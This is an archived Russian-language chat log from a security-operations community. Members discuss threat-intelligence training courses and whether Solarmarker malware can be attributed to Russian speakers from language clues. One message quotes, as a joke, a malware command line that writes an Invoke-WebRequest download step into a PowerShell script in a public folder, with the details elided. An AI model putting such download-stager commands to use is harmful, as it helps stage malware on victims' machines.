Size: a a a

SOС Технологии

2021 July 28

G

Gonzalez in SOС Технологии
Санс ценой немного не ок)
источник

DD

Daniel Doe in SOС Технологии
Да и по отзывам в плане контента GCTI вроде как недостаточно продвинутый)
Можно по истории чата поискать даже
источник

IM

Igor Mikhaylov in SOС Технологии
да он не то что не продвинутый...там больше про историю TI 😁
источник

AL

Alexey Lukatsky in SOС Технологии
Ну нет, он просто не про фиды 😊 Он про Intelligence, то есть как использовать данные об угрозах/инцидентах/итп при расследовании и принятии решений. Ждать от этого курса списка источников фидов точно не стоит
источник

IM

Igor Mikhaylov in SOС Технологии
вы когда его проходили?)
источник

IM

Igor Mikhaylov in SOС Технологии
осмелюсь спросить
источник

AL

Alexey Lukatsky in SOС Технологии
Хороший курс у Treadstone71
источник

AL

Alexey Lukatsky in SOС Технологии
Года 3-4 назад
источник

AL

Alexey Lukatsky in SOС Технологии
источник
2021 July 29

K

Kevin in SOС Технологии
Всякий, знакомый с growth / share matrix, без труда найдёт на ней место Windows и поймёт, почему Microsoft так делает.
источник

Z

Zer🦠way in SOС Технологии
👍🏻👍🏻👍🏻
источник

K

Kevin in SOС Технологии
источник

12

1 2 in SOС Технологии
Вирусня тоже бывает веселая:

c:/windows/system32/cmd.exe /c echo invoke-webrequest .....>> c:/users/public/downloads/bitch-pwnyou.ps1
источник
2021 July 30

AB

Alexey B in SOС Технологии
Да, с юмором у этих писателей норм )
источник

NA

Nikolai Arefiev in SOС Технологии
Всем добро вечера.
Я не силен в атрибуции, подскажите, плиз.
Действительно вот так вот она происходит
There are indicators and evidence suggesting that Russian language speakers created Solarmarker, or the creators at least designed it to look that way. Static and dynamic analysis of Solarmarker's droppers revealed attributes in the executables' resource section that indicate the files were created on a system with Russian language support. The keylogging module's name, "Uran," is a transliteration of the Russian word for Uranus, "Уран," and Russian was listed as a targeted language in the module itself. The name of the browser credential and information stealer, "Jupyter," could also be an attempted transliteration or translation of the Russian equivalent for Jupiter, "Юпитер," albeit an odd one. A more commonly accepted transliteration for a native Russian speaker would be "Yupiter." The names for the "Mars" module and its class object "Deimos" work both as direct English words and possible transliterations of their Russian equivalents, "Марс" and "Деймос."
источник

NA

Nikolai Arefiev in SOС Технологии
Security researchers from Morphisec, in their analysis of the Jupyter module, also pointed out similar indicators of the actor potentially being Russia-based, such as possibly misspelling the English "Jupiter" and the hardcoded IP addresses being hosted on "SELECTEL," a Russian ASN, which was also true for IP addresses found in other modules and Solarmarker variants during earlier stages of the campaign.
источник

NA

Nikolai Arefiev in SOС Технологии
т.е. достаточно просто воткнуть в код пару русских слов?
источник

NA

Nikolai Arefiev in SOС Технологии
Есть вообще какие-то работы по более научному подходу к атрибуции?
источник

T

Test in SOС Технологии
Меня тоже всегда поражал этот факт, мол комменты на русском, значит сделано в россии.. по-моему бред
источник

SR

Sergey Rublev in SOС Технологии
Ну там больше про мисспелинг слов. Он на самом деле не очевиден для незнакомого языка.
источник